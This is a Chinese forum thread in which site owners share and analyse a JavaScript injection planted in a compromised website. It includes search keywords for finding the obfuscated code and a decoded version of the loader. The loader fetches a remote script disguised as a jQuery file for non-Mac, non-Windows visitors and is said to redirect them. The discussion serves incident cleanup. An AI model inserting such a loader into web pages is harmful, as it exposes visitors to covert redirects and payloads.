网站被挂马了，挂马js发出来给大家

nk123

js马代码发出来，大家研究

1.zip (1 KB, 下载次数: 41)

2025-8-18 01:06 上传

点击文件名下载附件

nk123

美女约吗 发表于 2025-8-18 01:09
直接发js代码不就行了吗？为什么要打包呢？

hostloc禁止发，你试试

海的那一边

nk123 发表于 2025-8-18 01:36
hostloc禁止发，你试试

问ai结果删除以下代码段：
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/



全面排查网站文件：

攻击者可能不止在一处植入了代码。请仔细检查所有网站文件，特别是最近被修改过的文件，查找类似特征的混淆代码。可以搜索文件中是否包含 eval, aPnDhiTia, xxSJRox 等关键词。

代码末尾的注释 /*138ae887806f*/ 可能是攻击者的一个标识，您也可以尝试在所有文件中搜索这个字符串。

hxhx

海的那一边 发表于 2025-8-18 01:41
问ai结果删除以下代码段：
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/

前段时间我就发过帖子了 https://443502.xyz/thread-1424027-1-1.html

sfss5362

太可怕了

lanmin

gpt给还原后的代码

1. function loadJQuery() {
   
2.     // jQuery 3.6.8 CDN
   
3.     var url = "https://code.jquery.com/jquery.min-3.6.8.js";
   
4. 
   
5.     // 创建 script 标签
   
6.     var script = document.createElement("script");
   
7.     script.type = "text/javascript";
   
8.     script.src = url;
   
9. 
   
10.     // 加载完成的回调（原代码里是个空函数）
    
11.     script.onload = function () {
    
12.         console.log("jQuery 已加载:", url);
    
13.     };
    
14. 
    
15.     // 插入到 <head>
    
16.     document.head.appendChild(script);
    
17. }
    
18. 
    
19. // 如果不是 Mac 或 Windows 平台，就执行加载
    
20. if (!(/^Mac|Win/.test(navigator.platform))) {
    
21.     loadJQuery();
    
22. }
    

复制代码

nk123

美女约吗 发表于 2025-8-18 13:13
这代码是跳广告还是
？

跳转

NetAnt

月初的时候WP也被入侵了，只修改了WP站点文件。。
WP貌似被黑过三四次了。。。